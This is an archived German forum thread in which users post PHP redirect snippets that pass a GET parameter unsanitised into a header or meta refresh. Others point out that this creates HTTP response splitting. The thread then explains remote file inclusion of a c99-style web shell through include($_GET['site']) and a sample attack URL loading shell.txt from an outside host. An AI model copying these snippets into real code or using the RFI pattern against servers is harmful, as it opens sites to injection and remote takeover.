Archiv verlassen und diese Seite im Standarddesign anzeigen : PHP Code if(!$_GET['site'])
Frahmi14
09.08.2008, 14:06
Moin,
Weiß jemand den PHP Code wenn man zb. in der Leiste www.ADRESSE.de/index.php?seite=http://www.Google.de
Das man den auf Google weitergeleitet wird?
Glaube si in der Richtung war der Code
if(!$_GET['site'])
Weiß jemand den Code zufällig?
<?php
Header("Location: ".$_GET['site']."");
?>
Der sollte funktionieren.
H4x0r007
09.08.2008, 14:12
<?php
$URL = $_GET['site'];
if(!empty($URL)) {
header("Location: " . $URL);
}
?>
http://www.google.de/search?hl=de&client=firefox-a&rls=org.mozilla:de:official&pwst=1&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=html+weiterleitung&spell=1
Das sagt dir alles...
Aber hier für dich:
<html>
<head>
<meta http-equiv="refresh" content="1; url=<?php echo $_GET['site']; ?> ">
</head>
<body>
Sie werden automatisch weitergeleitet...
</body>
</html>
Edit: Was dir google auch sagen hätte können: Es gibt viele Möglichkeiten... Und diese Variante sollte man noch ein wenig verbessern --> htmlspecialchars und eine überprüfung, ob die var überhaupt gesetzt ist wäre auch möglich/nötig.
Lidloses_Auge
09.08.2008, 14:15
Herzlichen Glückwunsch Enco und H4x0r007,
sie haben soeben eine HTTP Response Splitting Lücke gecoded ;)
blackberry
09.08.2008, 16:36
<?php
Header("Location: ".$_GET['site']."");
?>
Der sollte funktionieren.
http://de.wikipedia.org/wiki/HTTP_Response_Splitting
^^
Frahmi14
12.08.2008, 22:54
Ja,Thx...
Ich hatte damals so ein TT gehabt wo stand das man denn dort zb. localhost/index?site=Http://DINESEITE.de/c99.PHP
Hatte dann konnte man über die C99 auf dem Server DEINESEITE doch durch den "?site" Include die Localhost hacken ?
Irgendwie komme ich da im mom durcheinander...Weiß jemand was ich Hier verwechsle oder falsch mache ?
http://free-hack.com/viewtopic.php?t=57546
Frahmi14
12.08.2008, 23:08
Ja,so meinte ich das...
Zitat: http://127.0.0.1/test.php?url=http://www.site.com/shell.txt
Aber wenn ich das in meine daten Umsetze : http://127.0.0.1/indexphp?site=http://www.meine seite.de/shell.txt
Schickt Er mich auf "meine seite.de" und Öffnet mia die txt....
Ja das ist schon klar, weil du die ja nicht includest, sondern du hast nach einer Weiterleitung gefragt ...
Und in dem Thread von Floo steht ja auch, was du wissen willst...
KINDER LERNT LESEN!!
include($_GET['site'])
Damit includest du die Shell und die Shell wird interpretiert.
Oben hast du aber nach einer Weiterleitung gefragt !!
Lidloses_Auge
13.08.2008, 15:56
Die Lücke, die ich ansprach hat nichts mit einer RFI gemein @ Frahmi14
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.